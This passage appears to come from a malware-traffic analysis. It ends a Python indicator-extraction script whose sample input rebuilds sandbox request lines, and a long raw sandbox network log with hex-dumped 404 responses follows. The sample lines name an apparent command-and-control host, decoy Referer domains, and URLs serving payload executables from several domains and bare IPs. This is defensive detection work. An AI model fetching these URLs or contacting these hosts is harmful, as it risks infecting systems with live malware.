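            "payload_urls": sorted(payloads), "ip_hosts": sorted(ips)}


# Sample input rebuilt from the report's own request lines (same hosts, paths, Referers, lengths).
_POST = ("Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-Alive"
         "Content-Type: application/x-www-form-urlencodedAccept: */*Referer: http://{ref}/"
         "User-Agent: " + IE11_UA + "Content-Length: {n}Host: host-data-coin-11.com")
_GET = ("Source: global trafficHTTP traffic detected: GET {path} HTTP/1.1Connection: Keep-Alive"
        "User-Agent: " + IE11_UA + "Host: {host}")
_POSTS = [("ptkbedc.org", 130), ("uoymbdayk.org", 281), ("mqousgs.net", 299), ("uhxofu.com", 180),
          ("gmykjkt.net", 155), ("quwfn.net", 190), ("plgevhj.net", 254), ("jwsdnsli.com", 153)]
_GETS = [("/files/9030_1641816409_7037.exe", "data-host-coin-8.com"),
         ("/downloads/toolspab3.exe", "privacy-tools-for-you-780.com"),
         ("/install5.exe", "unicupload.top"), ("/game.exe", "data-host-coin-8.com"),
         ("/6.php", "185.7.214.171:8080"),
         ("/files/6961_1642089187_2359.exe", "data-host-coin-8.com"),
         ("/l3.exe", "81.163.30.181"), ("/book/KB5009812.exe", "74.201.28.62"),
         ("/files/6961_1642089187_2359.exe", "data-host-coin-8.com"),
         ("/files/7729_1642101604_1835.exe", "data-host-coin-8.com"),
         ("/l2.exe", "81.163.30.181")]
REPORT_LINES = ([_POST.format(ref=r, n=n) for r, n in _POSTS]
                + [_GET.format(path=p, host=h) for p, h in _GETS]
                + ["Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1"
                   "Host: 74.201.28.62Connection: Keep-Alive"])
```

Running `extract_iocs(REPORT_LINES)` yields one C2 host, eight decoy Referer domains, nine distinct payload URLs and three bare-IP hosts. The Referer-mismatch rule is deliberately narrow (form POST to "/" with the IE11 UA and a Referer from a domain the client never otherwise contacted) so it can be run over proxy logs without tripping on ordinary form submissions, which carry a Referer on the same site.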
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1f b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:04:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:02 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:02 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:03 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a | Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:03 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 34 38 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 eb 98 bd a5 1d b7 51 d8 6d a5 1b 46 9b 10 bc be 71 b0 64 56 11 b1 b6 d8 40 fa 0f 85 1d 87 aa 64 9a 66 b0 f3 ce 13 6b b7 e4 4b 35 a9 f2 e0 0d 0a 30 0d 0a 0d 0a | Data Ascii: 48I:82OOjQmFqdV@dfkK50
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:06 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:06 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.14.0 (Ubuntu) | Date: Fri, 14 Jan 2022 20:03:44 GMT | Content-Type: text/html | Content-Length: 178 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
